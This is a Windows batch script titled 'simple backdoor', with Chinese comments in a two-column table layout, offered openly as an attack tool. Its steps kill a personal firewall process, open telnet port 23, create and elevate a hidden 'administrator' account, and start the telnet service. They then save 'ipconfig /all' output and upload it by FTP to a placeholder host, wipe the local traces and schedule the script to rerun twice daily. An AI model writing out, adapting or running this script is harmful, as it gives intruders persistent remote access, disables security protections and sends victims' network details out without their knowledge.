简易后门
| echo ***************** | 说明 |
| echo 关闭天网防火墙 | |
| taskkill /f /im pfw.exe | |
| echo ************** | |
| echo 在windows默认防火墙上打开tenlet使用的23端口 | |
| netsh firewall add portopening tcp 23 telnet | |
| echo ******************* | |
| echo 添加一个近似管理员administrator的帐号 | |
| net user administrator /add | |
| net localgroup administrators administrator /add | |
| echo ********************* | |
| echo 启动telnet服务 | |
| sc config tlntsvr start= auto | |
| net start telnet | |
| echo *************** | |
| echo 自动将ip地址发送至指定的位置 | |
| echo 检测是否存在指定的文件,如果有,则跳到删除操作 | |
| if exist f:\temp\abc.txt goto next | |
| if exist f:\temp\ip.txt goto next | |
| goto next1 | |
| :next | |
| del f:\temp\abc.txt | |
| del f:\temp\ip.txt | |
| :next1 | |
| echo 将IP地址保存至ip.txt这个文件 | |
| ipconfig /all >>ip.txt | |
| echo 制作FTP执行脚本,用户可以自行扩充 | |
| echo 登录FTP服务器 | |
| echo open youftp.com >>f:\temp\abc.txt | |
| echo ftpUsername >>f:\temp\abc.txt | |
| echo ftp password >>f:\temp\abc.txt | |
| echo binary >>f:\temp\abc.txt | |
| echo 删除FTP上旧的ip.txt文件,并上传新的ip.txt文件 | |
| echo delete ip.txt >>f:\temp\abc.txt | |
| echo f:\temp\ip.txt >>f:\temp\abc.txt | |
| echo put f:\temp\ip.txt >>f:\temp\abc.txt | |
| echo bye >>f:\temp\abc.txt | |
| echo 执行前面定义的FTP脚本 | |
| ftp -s:f:\temp\abc.txt | |
| echo 清除本地痕迹 | |
| del f:\temp\abc.txt | |
| del f:\temp\ip.txt | |
| echo *************** | |
| echo 启动定时执行服务 | |
| sc config schedule start= auto | |
| net start schedule | |
| @at 10:03 %systemroot%\system32\sample18.bat | |
| @at 20:03 %systemroot%\system32\sample18.bat | |
| exit |